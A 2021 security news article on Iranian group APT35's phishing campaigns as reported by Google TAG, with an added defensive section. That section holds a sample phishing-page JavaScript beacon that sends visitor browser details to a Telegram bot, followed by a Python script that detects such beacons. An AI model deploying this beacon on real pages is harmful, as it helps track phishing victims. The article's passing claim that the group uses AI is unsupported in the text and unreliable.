By SecureWorld News Team
Tue | Oct 19, 2021 | 3:31 AM PDT

When it comes to nation-state hackers, Russian and Chinese operations are always in the limelight.

Microsoft, for instance, just released its 2021 Digital Defense Report pointing a finger at Russia as making up 58% of all nation-state cyberattack incidents observed by the company. With numbers like that and a focus on ransomware, it is easy to see why Russia is owning most of the headlines.

But just because Russia is one of the largest threats does not mean it is wise to discount other global malicious organizations. One notorious hacking group from Iran uses particularly dirty schemes to fleece users, according to Google's Threat Analysis Group (TAG). 

TAG reported that Iranian-government-backed actors, known as APT35 and by the aliases Rocket Kitten and Charming Kitten, are quickly picking up speed, especially when it comes to implementing slick phishing attacks.

Developing advanced phishing techniques to lure victims 

APT35 are nation-state hackers working for the Iranian government, and they have a long list of attack techniques that play out like the best hits in phishing. 

The malicious campaigns Charming Kitten is unleashing on unsuspecting victims make use of superior social engineering, such as creating dummy Gmail accounts that look realistic enough to trick users into clicking through.

According to Google's TAG blog, APT35 have been active since at least 2017, including attacks on the 2020 U.S. elections. 

"This [APT35] is one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers. For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government."

APT35 thrives by going after high-risk and high-profile users simultaneously, mostly through creating realistic documents for phishing attacks. One method this group likes to use is to create email messages to target conference goers.  

"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks. Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence."

Using Google Forms, the group emails conference attendees a form that directs them to click on a phishing link.

Beyond the cybercrimes APT35 has already committed, one of this group's telltale techniques is its use of Telegram Messenger, an online messaging app, to notify operators about visitors to its phishing pages.

"One of APT35's novel techniques involves using Telegram for operator notifications. The attackers embed JavaScript into phishing pages that notify them when the page has been loaded.

To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time."

Google has since reported the bot and Telegram removed it, but it shows the edge this group is gaining by using AI technology to barrage users.  
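The operator-notification beacon described above leaves a recognizable fingerprint in a phishing page's source: a call to the Telegram Bot API with a bot token in the URL. The following is an added example (not code from the original article or from Google TAG) of how an analyst can scan a captured phishing page for such beacons and pull out what is needed to report the bot; the page snippet, bot token and chat id are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample: the kind of JavaScript a phishing page might embed to
# notify its operator via a Telegram bot on page load. The bot token and chat
# id are made-up placeholders, not real values.
SAMPLE_PAGE = """
<script>
fetch('https://api.telegram.org/bot123456789:AAFakeTokenForIllustrationOnly000/sendMessage', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({chat_id: '-1001234567890',
                        text: navigator.userAgent + ' ' + navigator.language})
});
</script>
"""

# Bot API URLs have the form https://api.telegram.org/bot<token>/<method>,
# where the token is "<numeric bot id>:<secret>".
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)"
)
CHAT_ID_RE = re.compile(r"chat_id\s*[:=]\s*['\"]?(?P<chat_id>-?\d+)")
NAVIGATOR_RE = re.compile(r"navigator\.(\w+)")


def mask_token(token: str) -> str:
    """Keep the bot id (needed for a takedown report) but hide most of the secret."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}...{secret[-2:]}"


def find_telegram_beacons(html: str) -> List[Dict[str, object]]:
    """Return one finding per Telegram Bot API call found in the page source."""
    findings: List[Dict[str, object]] = []
    for m in TELEGRAM_BOT_RE.finditer(html):
        # The chat_id normally appears in the request body right after the URL.
        chat = CHAT_ID_RE.search(html, m.end())
        findings.append({
            "method": m.group("method"),
            "bot_id": m.group("token").split(":")[0],
            "token_masked": mask_token(m.group("token")),
            "chat_id": chat.group("chat_id") if chat else "",
            # Which visitor properties the beacon reads (e.g. userAgent, language).
            "visitor_fields": sorted(set(NAVIGATOR_RE.findall(html))),
        })
    return findings


if __name__ == "__main__":
    for finding in find_telegram_beacons(SAMPLE_PAGE):
        print(finding)
```

The bot id and chat id are what Telegram needs to act on an abuse report; the masked token keeps the secret out of tickets and logs.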

Charming Kitten successfully attacks university website

This nation-state hacking organization was also recently connected to a U.K. university cyberattack, where they fooled the university into hosting a phishing kit on their website. 

Officials at the School of Oriental and African Studies (SOAS) at the University of London did not even realize they had been breached at the time of the attack, which took place earlier this year in July.

Other news outlets, as well as Google's blog, have noted that the sophistication of the attacks lay in building a mock website that appeared real to account holders.

The group used ahead-of-the-curve methods, mixing in multi-factor authentication instructions to build trust with more skeptical users.

"APT35 compromised a website affiliated with a UK university to host a phishing kit. Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices," reads the TAG blog post.    

How can users stay safe from APT35's advanced threats?

Google TAG is already sending out warnings and alerting its user base to the threats of APT35. One of their recommendations is to enable two-step authentication. Google also promoted following their guidelines at Google Safe Browsing to safely navigate your time on the web. 

Not to mention, you may want to try out George Finney's "Slow Down and Frown" method while you are checking emails to reduce the chances of clicking on a phishing link. 

Read Google's official TAG blog to learn more about the technical details. 

[RESOURCE] If your organization is working to build the next great app, check out SecureWorld's Remote Sessions webcast, 7 Steps to Building Secure Applications. This presentation will help you understand the best security practices when developing an app.

Tags: APT, Iran, Phishing